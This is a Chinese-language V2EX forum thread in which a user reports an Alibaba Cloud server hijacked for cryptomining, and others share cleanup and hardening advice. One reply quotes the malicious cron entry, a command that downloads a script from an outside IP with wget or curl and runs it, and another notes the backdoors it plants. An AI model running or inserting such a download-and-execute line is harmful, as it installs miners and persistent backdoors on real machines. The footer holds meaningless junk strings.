太可怕了,第一次碰到,阿里云服务器被人侵入用来挖矿了。。。。 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
bigxianyu
V2EX    服务器

太可怕了,第一次碰到,阿里云服务器被人侵入用来挖矿了。。。。

  •  
  •   bigxianyu 2024-06-01 10:16:38 +08:00 4265 次点击
    这是一个创建于 497 天前的主题,其中的信息可能已经有所发展或是发生改变。

    logroate 进程在狂刷 cpu , 知道是什么侵入的( 这是最可怕的) ,太可恶了,可怕。。。。

    22 条回复    2024-06-27 09:21:20 +08:00
    bigxianyu
        1
    bigxianyu  
    OP
       2024-06-01 10:18:26 +08:00
    然后阿里云告诉我说,你当前账号用的是免费版云安全中心,不支持病毒查杀。。。。
    Canglin
        2
    Canglin  
       2024-06-01 10:25:28 +08:00
    不过可以看是哪些进程,kill 掉后删除就好了,我也被弄过
    Foxkeh
        3
    Foxkeh  
       2024-06-01 10:30:59 +08:00
    只能检查下 SSH 和各种暴露到公网的弱密码, 安全组, 不明来源的软件或被爆出漏洞的第三方 Web 应用(尤其是用 root 权限运行的)

    然后建议重装
    tinyfry
        4
    tinyfry  
       2024-06-01 10:33:38 +08:00
    果断重装,不要开放一些不用的端口,密码强度要设置高一些,定期对组件进行升级。
    bigxianyu
        5
    bigxianyu  
    OP
       2024-06-01 10:48:05 +08:00
    @daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) , 这是 cron 任务里被添加的东西
    bigxianyu
        6
    bigxianyu  
    OP
       2024-06-01 10:48:44 +08:00
    @Canglin 嗯,已经手动弄了,搜到了以前也有人被搞过
    idragonet
        7
    idragonet  
       2024-06-01 10:48:59 +08:00
    系统重新安装肯定的,SSH 只开证书登录。
    bigxianyu
        8
    bigxianyu  
    OP
       2024-06-01 11:14:04 +08:00
    @bigxianyu 问下大佬们,IP 有举报功能吗 , 感觉可以有这个功能,
    bigxianyu
        9
    bigxianyu  
    OP
       2024-06-01 11:15:59 +08:00
    @bigxianyu 我要举报这个 ip ,找到对应的
    @bigxianyu 185.196.8.123 我要举报这个 IP , 感觉有点神奇,好像这个 IP 发生过好久了,我在 google 搜索都搜到了好几篇文章
    bigxianyu
        10
    bigxianyu  
    OP
       2024-06-01 11:24:52 +08:00
    @bigxianyu 类似骚扰电话功能
    virusdefender
        11
    virusdefender  
       2024-06-01 11:30:07 +08:00   1
    据我经验,50% 是 ssh 弱口令,30% 是 redis 弱口令,20% 是各种其他漏洞。
    Canglin
        12
    Canglin  
       2024-06-01 13:49:31 +08:00
    @bigxianyu #6 你是不是用过那种公共的 docker 镜像啊?我之前弄过一个 Oracle 和 MySql ,就被挖矿了
    slowman
        13
    slowman  
       2024-06-01 14:05:06 +08:00   6
    就是因为你们这种人,国产服务和 APP 才肆无忌惮的以安全保护的名义查用户的数据
    Pierro
        14
    Pierro  
       2024-06-01 15:24:00 +08:00
    之前用 docker 远程部署镜像 端口有漏洞就被挖矿了 各种查定时文件什么的 清了还是会自动执行 就直接重装了
    itechify
        15
    itechify  
    PRO
       2024-06-01 18:02:21 +08:00
    http://185.196.8.123/logservice.sh 这个文件做了好几个后门,systemd ,.bashrc ,cron ,都检查下
    bigxianyu
        16
    bigxianyu  
    OP
       2024-06-01 21:16:46 +08:00 via Android
    @oneisall8955 嗯嗯,是这三个
    akira
        17
    akira  
       2024-06-01 22:40:24 +08:00
    服务器直接作废 重新开一台吧,然后好好做好安全
    Gilfoyle26
        18
    Gilfoyle26  
       2024-06-02 02:03:52 +08:00
    阿里云这个回复,是真的让人心寒。
    JiunnTarn
        19
    JiunnTarn  
       2024-06-02 05:48:08 +08:00
    @Pierro #14 前天刚经历,一模一样
    ynkcc
        20
    ynkcc  
       2024-06-08 03:23:42 +08:00 via Android
    lazyrm
        21
    lazyrm  
       2024-06-23 15:08:04 +08:00 via iPhone
    我上次是因为开启了 jdk 的远程调试
    yier4ha
        22
    yier4ha  
       2024-06-27 09:21:20 +08:00
    xmr 门罗币挖矿 我都遇到好多次了。清除了 没用。然后把脚本里面的文件权限改了也不行。会检测 xmrig 没有执行权限他会自动授权。我感觉那次不是 ssh 弱口令问题,我改了好几次密码都会回来,而且重启路由改变了 IP 没过多久还是会进来,可能是某个看起来正常的我还在用的服务有问题。最后重装系统才搞定。
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     2675 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 23ms UTC 13:34 PVG 21:34 LAX 06:34 JFK 09:34
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86